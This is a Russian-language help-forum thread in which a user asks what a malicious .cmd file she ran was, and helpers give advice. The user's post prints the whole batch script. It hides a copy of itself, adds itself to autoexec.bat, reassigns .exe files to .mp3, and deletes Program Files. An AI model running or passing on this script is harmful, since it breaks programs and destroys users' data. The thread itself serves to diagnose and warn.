![]() |
что это за вирус?
как то зпустила у себя ".cmd", и перестал работать практический все файлы ехе-шки и т.д.
переустановила ОС, после установки стала устанавливать программы, но некоторые программы не стали работать оказалось дата стояла на 2100 чем-то, поменяла на нынешнюю, вроде все заработала, но я не пойму что это за вирус (если этого можно назвать вирусом) вот содержимое: @Echo off Echo Virus Loading Date 13.09.96 If exist c:ski.bat goto abc Copy %0 c:ski.bat Attrib +h c:ski.bat Echo c:ski.bat >>autoexec.bat :abc md HOOLI md HULII md DURDOMM md BICHI Label E: BAMBEI assoc .exe=.mp3 del c:Program Files/q Echo VIRUS LOAD |
Здравствуйте.Если подозреваете заражение Выполните правила
|
Думаю, что теперь сказать что-либо определенное уже невозможно
На всякий случай выполните правила и предоставьте логи |
Ну здравствуйте,
Цитата:
Цитата:
приведу пример, вот ехе файл нажимаешь а он превращаеться на скрытый и не открываеться я просила как предотварить без переустановки ОС, если еще раз такое случиться, содержимого ведь привела, тогда зачем вам лог, если и так содержимое есть |
anas, практически, это баловство (жестокое):
Цитата:
Вывод - не запускайте то, что не знаете. В остальном - следуйте рекомендациям . |
|
P.S. А уж бат-ник запускать, точно не следует. Поищите в корне раздела С: файл ski.bat (скрытый), откройте блокнотом и посмотрите, что в нем.
|
anas, Вы же после заражения систему переустановили? Или я чего-то не пойму
|
Цитата:
вот на днях случайно нашла этот cmd файл, и хотелось бы знать как тогда решить эту проблему без переустановки, дома я не одна, есть и другие которые может тупо запустить этот кошмарный файл P.S. но я не хочу еще раз запускать его, чтобы представить вам логи и другие файлы, сами подумайте Цитата:
Цитата:
|
Цитата:
|
Цитата:
|
Больше ничего. Спасибо.
Модераторы, закройте тему |
Тема закрыта. Для открытия темы топикстартер может обратиться в РМ, для всех остальных - создавайте новую тему с учетом правил
|
Время: 02:21. |
Время: 02:21.
© OSzone.net 2001-